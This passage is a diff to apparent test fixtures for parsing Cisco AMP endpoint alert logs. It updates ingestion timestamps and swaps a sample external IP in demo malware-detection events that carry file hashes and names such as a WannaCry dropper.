@@ -2051,8 +2051,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965541431Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671595485954000,\"timestamp\":1610623725,\"timestamp_nanoseconds\":899000000,\"date\":\"2021-01-14T11:28:45+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.FCE5B6784D-100.SBX.TG\",\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"pp32.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\pp32.exe\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\",\"sha1\":\"bdb11107a33eaeded6a838eb2a0e6167637dbe9c\",\"md5\":\"5df0c4ebca109779dc8afc745d612637\"}}}}", + "ingested": "2021-12-09T13:35:55.389051900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671595485954000,\"timestamp\":1610623725,\"timestamp_nanoseconds\":899000000,\"date\":\"2021-01-14T11:28:45+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.FCE5B6784D-100.SBX.TG\",\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"pp32.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\pp32.exe\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\",\"sha1\":\"bdb11107a33eaeded6a838eb2a0e6167637dbe9c\",\"md5\":\"5df0c4ebca109779dc8afc745d612637\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2074,7 +2074,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2115,7 +2115,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2125,8 +2125,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965543464Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":453000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389059300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":453000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -2146,7 +2146,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2196,7 +2196,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2213,8 +2213,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965545489Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":437000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389063900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":437000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2236,7 +2236,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2277,7 +2277,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2287,8 +2287,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965547528Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389067900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -2308,7 +2308,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2353,7 +2353,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2363,8 +2363,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965549581Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":361000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179213462437901\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389071100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":361000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179213462437901\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -2384,7 +2384,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2429,7 +2429,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2439,8 +2439,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965551613Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389075200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -2460,7 +2460,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2510,7 +2510,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2527,8 +2527,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965553704Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":797000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389080600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":797000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2550,7 +2550,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2591,7 +2591,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2601,8 +2601,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965555745Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389086Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -2622,7 +2622,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2663,7 +2663,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2673,8 +2673,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965557786Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat 